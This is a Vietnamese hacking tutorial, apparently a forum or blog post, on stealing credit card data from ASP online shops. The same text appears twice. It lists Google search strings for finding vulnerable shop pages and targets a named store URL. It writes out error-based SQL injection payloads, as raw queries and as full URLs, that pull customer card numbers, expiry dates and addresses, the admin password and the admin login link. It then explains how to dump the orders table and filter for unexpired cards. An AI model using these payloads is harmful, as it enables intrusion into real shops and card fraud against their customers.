TUT HƯỚNG DẪN HACK CC NEWBIE
Jo3-ght
đầu tiên lên google.còm tìm mấy từ khóa sau<< cái này ko được lười đâu đấy
Code:
shopexd.asp?id=xxx
shoptellafriend.asp?id=xxx
shopdisplayproducts.asp?id=xxx
mấy cái xxx thay = những con số nhé
vd ở đây kiếm được cái
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17
wow đẹp quá thử thêm cái " ' " xem nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'
ố là la cái j thế này
Code:
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' and hide=0 and (p.productmatch=' or p.productmatch is null) order by pother1,specialoffer desc,cname'.
/webstore/shop$db.asp, line 465
ở đây để cho các chú lười khó hiểu tớ cho luôn cái câu query để lấy cc
Code:
or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,orderid),'N ULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b' /'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL')) from orders where orderid not in ('1') order by orderid desc))--sp_password
//passadmin
áp dụng vào cái shop trên nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20%20or%201=convert( int,(select%20top%201%20convert(varchar,isnull(con vert(varchar,orderid),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b'%20/'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL'))%20from%20orders%20where%20orderid%20not% 20in%20%20('1')%20order%20by%20orderid%20desc))--sp_password
tiếp theo lấy pass của thằng admin cái chơi
câu lệnh
Code:
and 1=convert(int,(select top 1 fldusername%2b' // '%2bfldPassword from tbluser))--sp_password
thử xem nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17and%201=convert(int,( select%20top%201%20fldusername%2b'%20//%20'%2bfldPassword%20from%20tbluser))--sp_password
vậy là được user name và password của thằng admin rồi. nhưng còn link login thì sao nhỉ? >>> đưa câu lệnh sau vào xem thế nào
Code:
and 1=convert(int,(select top 1 fieldname%2b' // '%2bfieldvalue from configuration where fieldname not in ('affallowaffiliatesrevieworders','affcommissionin cludesallorders','affcommissionIncludesshipping',' affcommissionrate','affdirecturl','affinfourl','af fpaymenttypes','affsubject','afftemplateaffiliate' ,'afftemplateMerchant','affwebsite','xaddcatalogid ','xaddproductsubcategorybycategory','xaddproducts upplierdropdown','xadminmenucheck','xadminrestrict products')))--sp_password
he he cái gì đây
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20and%201=convert(in t,(select%20top%201%20fieldname%2b'%20//%20'%2bfieldvalue%20from%20configuration%20where%2 0fieldname%20not%20in%20('affallowaffiliatesreview orders','affcommissionincludesallorders','affcommi ssionIncludesshipping','affcommissionrate','affdir ecturl','affinfourl','affpaymenttypes','affsubject ','afftemplateaffiliate','afftemplateMerchant','af fwebsite','xaddcatalogid','xaddproductsubcategoryb ycategory','xaddproductsupplierdropdown','xadminme nucheck','xadminrestrictproducts')))--sp_password
vậy là có link login vào nhé vào rồi thì làm sao nhỉ? à nếu chỉ muốn kiếm cc thôi thì sau khi login vào trang admin vào Advanced Query
gõ hoặc copy
Code:
select * from orders
hà hà đơn giản chỉ thế thôi đương nhiên là các bạn nên dùng thêm mệnh đề where để tìm những cc nào còn hạn sử dụng và thay * = những trường cụ thể để đỡ rối mắt, và cái shop admin này còn nhiều thứ để nghịch ngợm lắm
Nguồn Jo3-GHT
đầu tiên lên google.còm tìm mấy từ khóa sau<< cái này ko được lười đâu đấy
Code:
shopexd.asp?id=xxx
shoptellafriend.asp?id=xxx
shopdisplayproducts.asp?id=xxx
mấy cái xxx thay = những con số nhé
vd ở đây kiếm được cái
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17
wow đẹp quá thử thêm cái " ' " xem nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'
ố là la cái j thế này
Code:
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' and hide=0 and (p.productmatch=' or p.productmatch is null) order by pother1,specialoffer desc,cname'.
/webstore/shop$db.asp, line 465
ở đây để cho các chú lười khó hiểu tớ cho luôn cái câu query để lấy cc
Code:
or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,orderid),'N ULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b' /'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL')) from orders where orderid not in ('1') order by orderid desc))--sp_password
//passadmin
áp dụng vào cái shop trên nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20%20or%201=convert( int,(select%20top%201%20convert(varchar,isnull(con vert(varchar,orderid),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b'%20/'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL'))%20from%20orders%20where%20orderid%20not% 20in%20%20('1')%20order%20by%20orderid%20desc))--sp_password
tiếp theo lấy pass của thằng admin cái chơi
câu lệnh
Code:
and 1=convert(int,(select top 1 fldusername%2b' // '%2bfldPassword from tbluser))--sp_password
thử xem nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17and%201=convert(int,( select%20top%201%20fldusername%2b'%20//%20'%2bfldPassword%20from%20tbluser))--sp_password
vậy là được user name và password của thằng admin rồi. nhưng còn link login thì sao nhỉ? >>> đưa câu lệnh sau vào xem thế nào
Code:
and 1=convert(int,(select top 1 fieldname%2b' // '%2bfieldvalue from configuration where fieldname not in ('affallowaffiliatesrevieworders','affcommissionin cludesallorders','affcommissionIncludesshipping',' affcommissionrate','affdirecturl','affinfourl','af fpaymenttypes','affsubject','afftemplateaffiliate' ,'afftemplateMerchant','affwebsite','xaddcatalogid ','xaddproductsubcategorybycategory','xaddproducts upplierdropdown','xadminmenucheck','xadminrestrict products')))--sp_password
he he cái gì đây
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20and%201=convert(in t,(select%20top%201%20fieldname%2b'%20//%20'%2bfieldvalue%20from%20configuration%20where%2 0fieldname%20not%20in%20('affallowaffiliatesreview orders','affcommissionincludesallorders','affcommi ssionIncludesshipping','affcommissionrate','affdir ecturl','affinfourl','affpaymenttypes','affsubject ','afftemplateaffiliate','afftemplateMerchant','af fwebsite','xaddcatalogid','xaddproductsubcategoryb ycategory','xaddproductsupplierdropdown','xadminme nucheck','xadminrestrictproducts')))--sp_password
vậy là có link login vào nhé vào rồi thì làm sao nhỉ? à nếu chỉ muốn kiếm cc thôi thì sau khi login vào trang admin vào Advanced Query
gõ hoặc copy
Code:
select * from orders
hà hà đơn giản chỉ thế thôi đương nhiên là các bạn nên dùng thêm mệnh đề where để tìm những cc nào còn hạn sử dụng và thay * = những trường cụ thể để đỡ rối mắt, và cái shop admin này còn nhiều thứ để nghịch ngợm lắm
Nguồn Jo3-GHT
No comments: